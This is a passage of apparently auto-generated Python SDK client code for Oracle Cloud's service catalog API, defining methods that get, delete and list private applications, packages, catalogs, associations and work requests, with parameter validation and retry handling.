if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_service_catalog_association(self, service_catalog_association_id, **kwargs):
"""
Removes an association between service catalog and a resource.
:param str service_catalog_association_id: (required)
The unique identifier of the service catalog association.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to
the value of the etag from a previous GET or POST response for that resource. The resource will be updated or
deleted only if the etag you provide matches the resource's current etag value.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/delete_service_catalog_association.py.html>`__ to see an example of how to use delete_service_catalog_association API.
"""
resource_path = "/serviceCatalogAssociations/{serviceCatalogAssociationId}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_service_catalog_association got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"serviceCatalogAssociationId": service_catalog_association_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def get_private_application(self, private_application_id, **kwargs):
"""
Gets the details of the specified private application.
:param str private_application_id: (required)
The unique identifier for the private application.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.PrivateApplication`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/get_private_application.py.html>`__ to see an example of how to use get_private_application API.
"""
resource_path = "/privateApplications/{privateApplicationId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_private_application got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"privateApplicationId": private_application_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="PrivateApplication")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="PrivateApplication")
def get_private_application_action_download_logo(self, private_application_id, **kwargs):
"""
Downloads the binary payload of the logo image of the private application.
:param str private_application_id: (required)
The unique identifier for the private application.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type stream
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/get_private_application_action_download_logo.py.html>`__ to see an example of how to use get_private_application_action_download_logo API.
"""
resource_path = "/privateApplications/{privateApplicationId}/actions/downloadLogo"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_private_application_action_download_logo got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"privateApplicationId": private_application_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "image/bmp, image/gif, image/jpeg, image/png, image/tiff",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="stream")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="stream")
def get_private_application_package(self, private_application_package_id, **kwargs):
"""
Gets the details of a specific package within a given private application.
:param str private_application_package_id: (required)
The unique identifier for the private application package.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.PrivateApplicationPackage`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/get_private_application_package.py.html>`__ to see an example of how to use get_private_application_package API.
"""
resource_path = "/privateApplicationPackages/{privateApplicationPackageId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_private_application_package got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"privateApplicationPackageId": private_application_package_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="PrivateApplicationPackage")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="PrivateApplicationPackage")
def get_private_application_package_action_download_config(self, private_application_package_id, **kwargs):
"""
Downloads the configuration that was used to create the private application package.
:param str private_application_package_id: (required)
The unique identifier for the private application package.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type stream
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/get_private_application_package_action_download_config.py.html>`__ to see an example of how to use get_private_application_package_action_download_config API.
"""
resource_path = "/privateApplicationPackages/{privateApplicationPackageId}/actions/downloadConfig"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_private_application_package_action_download_config got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"privateApplicationPackageId": private_application_package_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/zip",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="stream")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="stream")
def get_service_catalog(self, service_catalog_id, **kwargs):
"""
Gets detailed information about the service catalog including name, compartmentId
:param str service_catalog_id: (required)
The unique identifier for the service catalog.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.ServiceCatalog`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/get_service_catalog.py.html>`__ to see an example of how to use get_service_catalog API.
"""
resource_path = "/serviceCatalogs/{serviceCatalogId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_service_catalog got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"serviceCatalogId": service_catalog_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ServiceCatalog")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ServiceCatalog")
def get_service_catalog_association(self, service_catalog_association_id, **kwargs):
"""
Gets detailed information about specific service catalog association.
:param str service_catalog_association_id: (required)
The unique identifier of the service catalog association.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.ServiceCatalogAssociation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/get_service_catalog_association.py.html>`__ to see an example of how to use get_service_catalog_association API.
"""
resource_path = "/serviceCatalogAssociations/{serviceCatalogAssociationId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_service_catalog_association got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"serviceCatalogAssociationId": service_catalog_association_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ServiceCatalogAssociation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ServiceCatalogAssociation")
def get_work_request(self, work_request_id, **kwargs):
"""
Gets the status of the work request with the given ID.
:param str work_request_id: (required)
The ID of the asynchronous request.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.WorkRequest`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/get_work_request.py.html>`__ to see an example of how to use get_work_request API.
"""
resource_path = "/workRequests/{workRequestId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_work_request got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="WorkRequest")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="WorkRequest")
def list_applications(self, **kwargs):
"""
Lists all the applications in a service catalog or a tenancy.
If no parameter is specified, all catalogs from all compartments in
the tenancy will be scanned for any type of content.
:param str compartment_id: (optional)
The unique identifier for the compartment.
:param str service_catalog_id: (optional)
The unique identifier for the service catalog.
:param str entity_type: (optional)
The type of the application in the service catalog.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param int limit: (optional)
How many records to return. Specify a value greater than zero and less than or equal to 1000. The default is 30.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous \"List\" call.
:param str display_name: (optional)
Exact match name filter.
:param str entity_id: (optional)
The unique identifier of the entity associated with service catalog.
:param list[str] publisher_id: (optional)
Limit results to just this publisher.
:param list[str] package_type: (optional)
Name of the package type. If multiple package types are provided, then any resource with
one or more matching package types will be returned.
Allowed values are: "STACK"
:param list[str] pricing: (optional)
Name of the pricing type. If multiple pricing types are provided, then any resource with
one or more matching pricing models will be returned.
Allowed values are: "FREE", "BYOL", "PAYGO"
:param bool is_featured: (optional)
Indicates whether to show only featured resources. If this is set to `false` or is omitted, then all resources will be returned.
:param str sort_order: (optional)
The sort order to apply, either `ASC` or `DESC`. Default is `ASC`.
Allowed values are: "ASC", "DESC"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.ApplicationCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/list_applications.py.html>`__ to see an example of how to use list_applications API.
"""
resource_path = "/applications"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"compartment_id",
"service_catalog_id",
"entity_type",
"opc_request_id",
"limit",
"page",
"display_name",
"entity_id",
"publisher_id",
"package_type",
"pricing",
"is_featured",
"sort_order"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_applications got unknown kwargs: {!r}".format(extra_kwargs))
if 'package_type' in kwargs:
package_type_allowed_values = ["STACK"]
for package_type_item in kwargs['package_type']:
if package_type_item not in package_type_allowed_values:
raise ValueError(
"Invalid value for `package_type`, must be one of {0}".format(package_type_allowed_values)
)
if 'pricing' in kwargs:
pricing_allowed_values = ["FREE", "BYOL", "PAYGO"]
for pricing_item in kwargs['pricing']:
if pricing_item not in pricing_allowed_values:
raise ValueError(
"Invalid value for `pricing`, must be one of {0}".format(pricing_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"compartmentId": kwargs.get("compartment_id", missing),
"serviceCatalogId": kwargs.get("service_catalog_id", missing),
"entityType": kwargs.get("entity_type", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"displayName": kwargs.get("display_name", missing),
"entityId": kwargs.get("entity_id", missing),
"publisherId": self.base_client.generate_collection_format_param(kwargs.get("publisher_id", missing), 'multi'),
"packageType": self.base_client.generate_collection_format_param(kwargs.get("package_type", missing), 'multi'),
"pricing": self.base_client.generate_collection_format_param(kwargs.get("pricing", missing), 'multi'),
"isFeatured": kwargs.get("is_featured", missing),
"sortOrder": kwargs.get("sort_order", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="ApplicationCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="ApplicationCollection")
def list_private_application_packages(self, private_application_id, **kwargs):
"""
Lists the packages in the specified private application.
:param str private_application_id: (required)
The unique identifier for the private application.
:param str private_application_package_id: (optional)
The unique identifier for the private application package.
:param list[str] package_type: (optional)
Name of the package type. If multiple package types are provided, then any resource with
one or more matching package types will be returned.
Allowed values are: "STACK"
:param int limit: (optional)
How many records to return. Specify a value greater than zero and less than or equal to 1000. The default is 30.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous \"List\" call.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param str sort_by: (optional)
The field to use to sort listed results. You can only specify one field to sort by.
`TIMECREATED` displays results in descending order by default. You can change your
preference by specifying a different sort order.
Allowed values are: "TIMECREATED", "VERSION"
:param str sort_order: (optional)
The sort order to apply, either `ASC` or `DESC`. Default is `ASC`.
Allowed values are: "ASC", "DESC"
:param str display_name: (optional)
Exact match name filter.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.PrivateApplicationPackageCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/list_private_application_packages.py.html>`__ to see an example of how to use list_private_application_packages API.
"""
resource_path = "/privateApplicationPackages"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"private_application_package_id",
"package_type",
"limit",
"page",
"opc_request_id",
"sort_by",
"sort_order",
"display_name"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_private_application_packages got unknown kwargs: {!r}".format(extra_kwargs))
if 'package_type' in kwargs:
package_type_allowed_values = ["STACK"]
for package_type_item in kwargs['package_type']:
if package_type_item not in package_type_allowed_values:
raise ValueError(
"Invalid value for `package_type`, must be one of {0}".format(package_type_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIMECREATED", "VERSION"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"privateApplicationId": private_application_id,
"privateApplicationPackageId": kwargs.get("private_application_package_id", missing),
"packageType": self.base_client.generate_collection_format_param(kwargs.get("package_type", missing), 'multi'),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing),
"displayName": kwargs.get("display_name", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="PrivateApplicationPackageCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="PrivateApplicationPackageCollection")
def list_private_applications(self, compartment_id, **kwargs):
"""
Lists all the private applications in a given compartment.
:param str compartment_id: (required)
